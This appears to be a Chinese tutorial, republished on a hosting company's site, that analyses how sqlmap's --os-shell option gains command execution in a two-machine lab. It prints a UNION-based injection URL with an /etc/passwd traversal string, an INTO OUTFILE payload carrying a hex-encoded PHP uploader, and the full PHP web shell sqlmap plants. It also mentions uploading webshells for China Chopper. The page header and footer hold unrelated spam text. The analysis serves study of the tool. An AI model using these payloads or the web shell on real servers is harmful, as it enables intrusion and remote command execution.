亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

sqlmap之os?shell怎么使用

發布時間:2023-03-02 14:11:35 來源:億速云 閱讀:157 作者:iii 欄目:開發技術

這篇文章主要介紹“sqlmap之os shell怎么使用”,在日常操作中,相信很多人在sqlmap之os shell怎么使用問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”sqlmap之os shell怎么使用”的疑惑有所幫助!接下來,請跟著小編一起來學習吧!

    0x00 Background

    最近遇到測試環境,最后利用sqlmap的--os-shell參數取得shell。一直以來,對這個參數的工作原理不是十分的清晰。大致的思想應該是將腳本插入到數據庫中,然后生成相應的代碼文件,獲取shell即可執行命令。

    0x01 Environment[

     本環境是在局域網下利用兩臺主機搭建的,環境比較真實。

    攻擊機:

    • 系統:windows7

    • 工具:sqlmap

    靶機:

    • 系統:windows7

    • 環境:wamp搭建的apache、mysql和php

    • 網頁源碼:phpmywind,此處修改了點源代碼,方便進行測試。

    0x02 Attack demo

    (1)環境測試

    url:192.168.0.166/php/newsshow.php?cid=4&id=11

    截圖:

    sqlmap之os?shell怎么使用

    (2)攻擊

    python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 --os-shell

    sqlmap之os?shell怎么使用

    (3)選擇語言

    sqlmap默認為php,此處根據需求選擇。

    sqlmap之os?shell怎么使用

    (4)輸入絕對路徑

    此處因為用wamp搭建,并安裝在c盤下。所以選擇2選項,輸入路徑為c:/wamp/www

    sqlmap之os?shell怎么使用

    (5)建立os-shell并執行命令

    sqlmap之os?shell怎么使用

    0x03 Analysis

    (1)抓包

    利用wireshark進行抓包

    sqlmap之os?shell怎么使用

    (2)第一個url分析

    http://192.168.0.166/php/newsshow.php?cid=4&BWGH%3D3922 AND 1%3D1 UNION ALL SELECT 1%2C2%2C3%2Ctable_name FROM information_schema.tables WHERE 2>1-- ..%2F..%2F..%2Fetc%2Fpasswd

    url解碼

    http://192.168.0.166/php/newsshow.php?cid=4&BWGH=3922 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd

    sqlmap之os?shell怎么使用

    這條語句我認為對于os-shell并沒有實際性的作用。

    (3)插入數據

    3.1解析into outfile

    http://192.168.0.166/php/newsshow.php?cid=-6901 OR 3616%3D3616 LIMIT 0%2C1 INTO OUTFILE '%2Fwamp%2Fwww%2Ftmpulujm.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c77616d705c5c7777775c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- -- -

    解析url(除16進制字符)

    http://192.168.0.166/php/newsshow.php?cid=-6901 OR 3616=3616 LIMIT 0,1 INTO OUTFILE '/wamp/www/tmpulujm.php' LINES TERMINATED BY 0x...

    解釋:select * from * limit 0,1 into outfile '/wamp/www/tmpulujm.php'的意思是將內容輸入到outfile中。

    LINES TERMINATED BY則是into outfile的參數,意思是行結尾的時候用by后面的內容,通常的一般為‘/r/n’,此處我們將by后的內容修改為后面的16進制的文件。

    解析16進制文件

    sqlmap之os?shell怎么使用

    如上圖,16進制轉換為字符串為:

    `

    轉換后的代碼

    顯然,16進制為php代碼。

    先訪問以下tmpulujm.php

    sqlmap之os?shell怎么使用

    此處主要實現了向服務器傳輸文件的一個功能。此處簡單看下上述文件php語句進行分析。

    sqlmap之os?shell怎么使用

    實現的就是上傳文件,同時根據phpversion,將上傳的文件的權限進行修改。學習到一點就是4.1.0的版本下,可直接執行。

    (4)執行命令

    現在我們已經可以上傳文件了,但是仔細考慮一下,sqlmap是提供一個os-shell,我們現在只分析到了可以上傳文件的步驟。那接下來,還需要在抓取的數據中進行分析。

    在分析數據包中,我看到一個post數據包,從content中看到此數據包是實現了上傳一個類似于cmd的一個php文件。

    sqlmap之os?shell怎么使用

    從上圖可以看到,利用tmpulujm.php上傳了一個tmpbtfgo.php的文件。將tmpbtfgo.php的內容截取出來,得到了一段php代碼。格式請自行調整。

    <?php 
    $c=$_REQUEST["cmd"];
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time',0);
    $z=@ini_get('disable_functions');
    if(!empty($z))
    {
    	$z=preg_replace('/[, ]+/',',',$z);
    	$z=explode(',',$z);
    	$z=array_map('trim',$z);}
    else
    	{
    		$z=array();
    		}
    $c=$c." 2>&1\n";
    function f($n)
    {global $z;
    return is_callable($n)and!in_array($n,$z);
    }
    if(f('system'))
    {ob_start();
    system($c);
    $w=ob_get_contents();
    ob_end_clean();
    }elseif(f('proc_open')){
    	$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
        $w=NULL;
        while(!feof($t[1])){
    		$w.=fread($t[1],512);
    	    	}
            @proc_close($y);
    }
        elseif(f('shell_exec')){
    	$w=shell_exec($c);
    	}
    	elseif(f('passthru')){
    		ob_start();
    		passthru($c);
    		$w=ob_get_contents();
    		ob_end_clean();
    		}elseif(f('popen')){
    			$x=popen($c,r);
    			$w=NULL;
    			if(is_resource($x)){
    				while(!feof($x)){
    				$w.=fread($x,512);
    					}
    					}
    					@pclose($x);
    					}elseif(f('exec')){
    						$w=array();
    						exec($c,$w);
    						$w=join(chr(10),$w).chr(10);
    						}else{
    							$w=0;
    							}
    							print "</pre>".$w."</pre>";?>'''

    上述代碼實現了os-shell得到了命令后,如何執行命令以及輸出執行結果到os-shell中。
    因此我們可以在os-shell中執行命令。

    0x04 os-shell的使用

    通過上述的分析,我們知道了sqlmap os-shell參數的用法以及原理。

    很多的人會對os-shell的使用進行吐槽,這是得要多大的權限才能執行。是的,os-shell的執行條件有三個

    (1)網站必須是root權限

    (2)攻擊者需要知道網站的絕對路徑

    (3)GPC為off,php主動轉義的功能關閉

    此處對于中小型企業,如果自己搭建的服務器,例如直接用wamp或者phpnow等快捷方式搭建的服務器,基本上可以滿足以上三個條件。
    同時,對于os-shell的用法,很多的小伙伴會吐槽,都他么能上傳了,還搞jb的os-shell了。對的,我們可以直接上傳大馬進行下一步的工作。當然亦可以上傳一句話,然后利用菜刀進行連接。

    此處只是對sqlmap工作原理進行了一頓分析。至于利用方式以及攻擊手段,當然有很多種,自行發散思維即可。接下來的工作是直接看下sqlmap的源碼,才能理解的更為深刻。

    到此,關于“sqlmap之os shell怎么使用”的學習就結束了,希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習,快去試試吧!若想繼續學習更多相關知識,請繼續關注億速云網站,小編會繼續努力為大家帶來更多實用的文章!

    向AI問一下細節

    免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

    AI

    河曲县| 平原县| 高雄县| 黎川县| 苍山县| 平顺县| 怀安县| 伊金霍洛旗| 巨鹿县| 阆中市| 堆龙德庆县| 炉霍县| 平谷区| 仁寿县| 伊金霍洛旗| 西华县| 新津县| 永清县| 奈曼旗| 龙岩市| 铅山县| 海南省| 岑巩县| 科尔| 加查县| 镇原县| 永和县| 伊通| 平安县| 靖西县| 兴宁市| 工布江达县| 广汉市| 射阳县| 航空| 芒康县| 寿宁县| 天津市| 茌平县| 阿克| 缙云县|